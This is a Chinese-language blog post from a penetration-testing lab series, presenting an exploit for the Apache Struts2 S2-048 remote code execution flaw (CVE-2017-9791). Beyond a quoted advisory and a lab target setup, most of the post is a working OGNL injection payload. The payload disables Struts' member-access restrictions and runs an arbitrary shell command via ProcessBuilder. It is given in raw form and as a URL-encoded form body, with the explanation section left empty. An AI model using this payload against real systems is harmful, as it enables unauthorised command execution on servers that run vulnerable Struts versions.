Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP

最新推荐文章于 2023-11-24 16:53:53 发布

Hummer-200

最新推荐文章于 2023-11-24 16:53:53 发布

阅读量2.5k

点赞数

分类专栏：渗透测试实验文章标签： struts 安全 java

本文链接：https://blog.csdn.net/qq_51459600/article/details/122310522

版权

渗透测试实验专栏收录该内容

17 篇文章 3 订阅

订阅专栏

Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP

官方描述：

It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user, i.e. when using untrusted input as a part of the error message in the ActionMessageclass.

环境搭建

靶机：CentOS7（192.168.2.102：48938）

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9yQUNTp9-1641297939424)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211226115030.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uB6XqSjT-1641297939425)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211226115041.png)]

漏洞利用

主要受影响的Struts版本为：2.3.x

得出正确结果，证明漏洞存在

构造payload：

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls /tmp').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

URL编码后：

name=%25%7B(%23_%3D'multipart%2Fform-data').(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D'ls%20-l%20%2Ftmp').(%23iswin%3D(%40java.lang.System%40getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3D(%23iswin%3F%7B'cmd.exe'%2C'%2Fc'%2C%23cmd%7D%3A%7B'%2Fbin%2Fbash'%2C'-c'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%23ros%3D(%40org.apache.struts2.ServletActionContext%40getResponse().getOutputStream())).(%40org.apache.commons.io.IOUtils%40copy(%23process.getInputStream()%2C%23ros)).(%23ros.flush())%7D&age=123&__checkbox_bustedBefore=true&description=123

再次提交抓包如下：

也可以直接利用工具：

漏洞原因

参考：

Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP - 先知社区 (aliyun.com)

Hummer-200

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP

Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP官方描述：It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user, i.e. when using u
复制链接

扫一扫